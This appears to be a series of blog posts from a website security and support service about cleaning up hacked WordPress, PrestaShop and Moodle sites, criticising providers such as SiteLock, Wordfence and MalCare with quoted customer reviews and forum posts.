The Location of Malware on a Website Probably Won’t Show Source of the Hack

It isn’t uncommon to see people claiming that certain software is the cause of their website being hacked based solely on malicious code being found in a file from the software. In reality, the files being impacted by malware usually have no connection with the cause of the hack. Instead, once the hacker has the ability to modify existing files, they can usually change any files. Sometimes hackers will modify all the files of a certain type. Other times, they will modify random files. They may also add new files in random locations.

There is one major exception to this. If a hacker gains access to the website through a vulnerability that allows uploading files to a certain location, then finding malicious files there is a strong indication that was the cause.

While the location of malicious code likely doesn’t tell you how the website was hacked, log files can go a long way to telling you that. That depends on having logging for the method of access the hacker used and that logging being available for when the website was hacked. If a hacker got in through FTP access, but you don’t have a log of that, then you are out of luck. If the hacker originally gotten in months ago, but the hack was only spotted recently, there is a good chance that logging is no longer available.

Even if you have logging available that would show the source of the hack, you need to be able to pick that out of the logging data. That is where having someone that deals with doing that on a regular basis will produce better results than trying to review the logging yourself.

Why Your Website is Broken or Down After Having Automated Malware Removal Done

It isn’t uncommon to see people complaining about their websites being broken or down after having a malware removal service deal with malware that had been on the website. If the website wasn’t having that problem before the malware was removed, the cause of this is likely the usage of automated malware removal without careful supervision to make sure that all the added code is removed, while not removing any preexisting code.

To give an example of how things get messed up, take a website we saw after automated malware removal was done. At the top of the website’s pages was “?>”. For those not familiar with PHP coding, that is the end tag for PHP code. What probably happened is that there was code added to the beginning of a file that looks like this (with “malicious code” filling in for the actual malicious code):

<?php “malicious code” ?>

The automated malware removal then removed ‘<?php “malicious code”‘, but left the last part.

Depending on what has been damaged, fixing this can be relatively easy or rather hard.

Before making any more changes, make sure to make a backup of anything that is going to be changed. Worst case, you can revert back to where you started before trying to deal with this.

Whoever did the malware removal really should address this, but if this is an obvious issue across the website, they clearly are not too concerned about the quality of their work, so you may not want them making more changes.

If you don’t feel comfortable handling this yourself, a good web developer should be able to addressing this for you.

SiteLock and Their Partners Including Bluehost and HostGator are Still Producing Bad Results

Earlier this week, we interacted with someone dealing with the mess that is having SiteLock brought in to clean up a malware infected website. They are not alone in that. Here was a review of them left on Trustpilot in October:

This is a company with no service and it’s a scam! It has been six weeks since I purchased their service and my site is down for the third time during their ‘monitoring’. I just keep receiving generic/automated emails about the removal of threats every two days or so while my website is still down!
I purchased it through Blue Host. I am puzzled as to why BH is recommending Site Lock. Service on both sides is mediocre or nonexistent. BH agents who barely spoke English were arguing with me with raised voices that I needed to be patient and wait until they had time to fix the website! I don’t want to use and be associated with either one of them! Site Lock is a scam and BH is not taking responsibility for recommending it. Thoroughly frustrated.

The person we were interacting with also is a customer of Bluehost. That reviewer wondered why they recommend SiteLock. The answer is pretty simple. Bluehost gets paid by SiteLock if they are hired.

It isn’t just Bluehost. Here was another review from October:

I was called up by “hostgator security” stating that my site had Malware. I asked them to revert it to a backup, and they said it would be $50 and no guarantee of fixing the malware, but I should use “Site Lock” instead. With 2 domains it would be $500, they would remediate the malware immediately, and then provide 12 months of monitoring service. Normally, I’d just handle malware myself, but I’ve got alot going on, so I decide to let these professionals handle it. I ask them what happens if my site goes down during this process, and they assure me that would not happen because the only files that would be removed is malware. I ask, ok, what if some kind of accident happens and it goes down anyway? “They will help you, they are on top of it.” Okay great. I pay the money, for the next 24 hours I get a dozen emails about site scans happening. I check the next day, and both of my websites will not load. I call the Site Lock number and they tell me there are 19 directories for which I have not paid for Sitelock, and he thinks the malware is hiding there, and I need to pay for service for each of those directories. 19 + 2 X $250 is $5,250, which is as silly, ridiculous, halfbaked and outrageous a number as is the premise that more site scans will fix the problem. I come to find out Hostgator and sitelock are two separate companies. This is not a professional team that works together to remediate malware, in my opinion. I call back the hostgator rep who sold me the services, which atleast I’m grateful he was easy to get a hold of, and I’m told he will open a ticket which may take up to 24 hours to get a response to. These are active business websites with advertising running to them. I should not have trusted Hostgator, and I should not have trusted Sitelock. After this is all over, I’m going to look at hosts who don’t charge to revert backups.

There were plenty of other Trustpilot recent reviews that are similar. This isn’t really news to us since we used to have a lot of interactions with people who had hired them to deal with hacked websites or who had web host were pushing to them to, where the same issues came up.

We don’t have good advice to give to those who have already hired SiteLock. But for those that haven’t, the best advice is to avoid them.

If someone else has good advice for those who have hired them and are experiencing problems, leave a comment below.

It Shouldn’t Take SiteLock Days to Remove Malware From a Hacked WordPress Website

In dealing with hacked websites, a company that we used to have come up a lot in conversations with clients was SiteLock. There have been many problems we have run across with them in past years. We were contacted this week by someone dealing with them after malware was detected on their website by Bluehost. Bluehost gets paid by SiteLock if you hire SiteLock to clean up the website, which is why they promote hiring them to clean it up. It isn’t because SiteLock does a good job of it.

That was on display with what this person was dealing with this week. They were now on the fifth day of SiteLock working on removing the malware from their hacked WordPress website (or at least they were supposed to be working on it). It shouldn’t take that long. It usually should take a few hours to do that clean up. At least when we are cleaning up a hacked WordPress website, that is how long it takes. That is with us doing a proper cleanup, whereas lots of providers, including SiteLock in our past experience, don’t do, so it should take less time than that.

We don’t have good advice to give to those who have already hired SiteLock. But for those that haven’t, the best advice is to avoid them.

If someone else has good advice for those who have hired them and are experiencing problems, leave a comment below.

Upgrading PrestaShop 1.6 Probably Isn’t the Right Response if Your Website Starts Having a Problem

A reoccurring issue we have run into is that people contact us looking to have software on their website upgraded because a problem with the website has started occurring. They fail to mention that at all, leading to them complaining that the problem hasn’t been fixed after the upgrade. It happens so much they we now note in description of our upgrade services that upgrading probably won’t solve a problem they are having, but that we can address the problems while doing the upgrade. We also specifically ask if they are having any issues with the website, in case they miss that note, so they can we avoid having unhappy customers.

We recently had an example of that sort of situation that deserves special note, because it could lead to serious problems. We had someone contact us looking for an upgrade of PrestaShop, where they were currently using the last version of PrestaShop 1.6. Upgrading any further means upgrading to PrestaShop 1.7.

Going from PrestaShop 1.6 to 1.7 sounds like a relatively minor upgrade, but it is actually a major upgrade. Existing themes and modules won’t work with the new version. So someone doing that upgrade trying to fix a problem is likely going to have new headaches to deal with in addition to the still unresolved problem.

PrestaShop doesn’t suddenly change how it is working. So if something starts going wrong, that means something else has changed. If server-level software changes, that could cause problems with PrestaShop that an upgrade could resolve. But other changes will not be resolved that way. For example, a hack won’t be resolved by upgrading and trying to upgrade when there is malicious code on a website could actually cause even more problems.

If you don’t know what is going wrong with your PrestaShop website, it is best to find help to fix the problem instead of guessing at a fix, like doing an upgrade, and hiring someone to do that. If you do need PrestaShop support, we are there to help.

Moodle Doesn’t Yet Actually Require MySQL 8.0

We were recently working on an upgrade of a Moodle website to version 4.3, which originally started as an upgrade to Moodle 4.2. We ran into an issue because those versions require that those using the MySQL database server to be using at least version 8.0. That is up from the previous requirement of at least version 5.7. The web host for the website hadn’t yet moved to that version, so we were at an apparent impasse.

Checking further into this, we found that, while the required MySQL version was raised in the Moodle 4.2. That version doesn’t appear to actually be required. The discussion on raising the required version can be found here. The change wasn’t made because of usage of new features of MySQL 8.0, but because support for MySQL 5.7 was going to be ending soon.

In line with that, there were no problems with the website after upgrading to Moodle 4.2 or 4.3 caused by the usage of the older version of MySQL.

Getting through Moodle’s pre-upgrade checks did require manually changing the required version of MySQL in the file /admin/environment.xml.

Wordfence Security Daily Malware Scans Are Not the Way to Clean Up a Malware Infection of a WordPress Website

If your WordPress website has been hacked and contains malware, a common suggestion for cleaning it up is to use the Wordfence Security plugin. There are a number of problems with that. One being that it won’t necessarily catch all the malware, as someone looking for help with the plugin recently noted:

Hello, I’m using the free version and I’m doing daily scans because my site has a malware. At some point the scan did not detect some new folders that have been created in the root folder.

The folders has some random characters as an name and it contains an index file and a cache folder.

The larger problem with what they were bringing up there is that if you had cleaned up the malware, there wouldn’t even be more malware to possibly detect day after day. So something has gone wrong there.

If there is malware on a WordPress website, the focus shouldn’t be on removing the malware, though it does need to be removed. It should be how it got there, which is something that Wordfence Security can’t determine. When the plugin removes the files without determining that, it makes it harder to figure out.

Another important reason for trying to figure out how the website was infected, which have seen over and over in years of being brought in to re-clean hacked WordPress websites, is that in doing the work to try to figure out how the website was hacked, you often find malware or other malicious code that otherwise would have been missed.

Figuring out how the malware got there in the first place or at least stopping it from getting back in basic part of a proper hack cleanup, but something that many security providers, including the developer of Wordfence Security, either don’t do or fail to accomplish.

Wordfence Care Failed to Resolve Reoccurring Malware Issue on WordPress Website

When it comes to cleaning up hacked WordPress websites, the most important part of doing that is often not done. That being trying to figure out how the website was hacked and fixing that. Sometimes you can get away with failing to do that, other times the problem is going to come back again and again.

As an example of that, take someone who was looking for help with a hacked WordPress website recently from the developer of the Wordfence Security plugin. They wrote that they had done the following:

Steps I have taken so far:

  1. Scanned my website using a security plugin, but the malware continues to reappear.
  2. Removed wp-links.php, sw.js, index.php, google.json, and the affected plugin files manually from the respective directories.
  3. Checked theme files for suspicious code and removed any identified malicious snippets.
  4. Updated WordPress, themes, and plugins to their latest versions.
  5. Changed all passwords related to my website, including admin, FTP, and database.

But that hadn’t resolved the issue:

Despite these efforts, the malware keeps reappearing, and I’m unable to find the source of the infection.

They rightly understood the need to figure out the source of the infection, which notably is something that many malware cleanup services for WordPress websites don’t do. We know they don’t do that because we are often brought in to re-clean hacked WordPress websites where that wasn’t done before and doing that shows that in addition to not finding the source of the infection; the provider missed parts of the malware currently on the website.

The response from the developer didn’t provide helpful information, but it did promote hiring them to clean up the website. According to the poster they tried that, getting the Wordfence Care service, but that didn’t help:

I already got the Wordfence Care, but you still can’t give the permanent solution for me.

The results from the more expensive Wordfence Response don’t appear to be better.

WordPress Security Plugins Won’t Fully Disinfect a Hacked WordPress Website

When it comes to cleaning up hacked WordPress websites, there is a lot of advice suggesting solutions that are easy, but don’t properly address the situation. That leads to continuing issues that could have been addressed quickly if handled by a professional like us.

As an example of what not to do, take a recent post from the WordPress Support Forum, where someone claimed to have done a full disinfection of a website, which hadn’t worked:

Despite the fact that we did full disinfections, restored backup files several times, and added strong security systems plus CDNs, Google Search Console and McAfee blocked us from the site, for being malicious, for a long time.

One thing missing there is trying to figure out how the website was hacked. That is important for multiple reasons. One of them being that if you don’t know how the website was hacked, then you can’t be sure the issue has been addressed and won’t happen again. Another reason is that if you don’t know how the website was hacked, then you also likely don’t know when it was hacked. Restoring a backup file won’t clear out malicious code, if the malicious code is in the backup as well.

Another issue is that they were trying to find malicious code using several WordPress security plugins, which didn’t find it:

This code is invisible to the user and to monitoring systems such as Wordfence, iThemes S[ecurity], All-In-One Security (AIOS), and Anti-Malware Security and Brute-Force Firewall. None have detected it.

While they are claiming the code was invisible, their description of it tells a different story:

A function added to the head of a theme’s .js file, which uses a “Get” call and links to an encrypted external link.

It is only shown when loading certain pages in the browser code inside (it is not always shown…)

During a proper cleanup, theme files would be checked and before even starting on a hack cleanup, a professional should have noticed the code was being loaded on the website (even though the subsequent code loaded would only occur in some instances). A professional would have been looking for the code before starting, as often people think that some other issue with a website is a hack. So they want to make sure a hack cleanup is needed before starting.

Automated malware detection doesn’t work well, as it both fails to detect plenty of malicious code (as occurred here) and also flags legitimate code as being malicious.

MalCare Customer Indirectly Warns It Fails to Protect Websites From Being Hacked

We recently were contacted with a strange request. Someone was asking us for a refund for a hack cleanup plan. We don’t have any such plans. We provide onetime cleanups and we only charge after the hack cleanup is completed. It turned out that the person had somehow run across a two-year-old post of ours warning about a provider named Malcare, titled MalCare Review: It’s Obvious They Are Taking Advantage of Their Customers, and then contacted us as if we were Malcare.

The request for a refund mentioned things that were in line with what we were warning about two years ago. They wrote this in part:

 Your plan was not working out as planned. I am still cleaning up a lot of damage since my site was hacked, I had to resort to a different plan.

And this:

Looking at the backup you had on your site, the database was filled with numerous users, of which I did not know. I had to clean up my database manually.

After dealing with that, we were curious to see if other of their customers have been complaining about their service recently. What we saw was that people are still being misled by them in to believing that their service offers things it doesn’t, while another of their customers who are not criticizing the service refuted that.

Here is part of one recent customer review:

Definitely a game-changer for our websites. Full removal of hacks and complete protection from current and future attempts.

The customer obviously doesn’t know that it will actually offer complete protection from future hacking attempts. The service can’t do that, but everything we have seen it won’t even do a good job of the protection it could possibly offer. Don’t take our word for that. Here was part of another recent positive customer review:

MalCare and the team behind it have gone above and beyond their stated service to help me restore my website from malicious hacks of my WordPress website. On more than one occasion they were able to scan and clean my site of infected files. Anyone who has a website knows how horrible it feels to learn that your site has been hacked.

Based on that, their website has been hacked at least once while using MalCare’s service. If that wasn’t the case, they wouldn’t have been cleaning it up multiple times, unless they failed to properly clean it up the first time.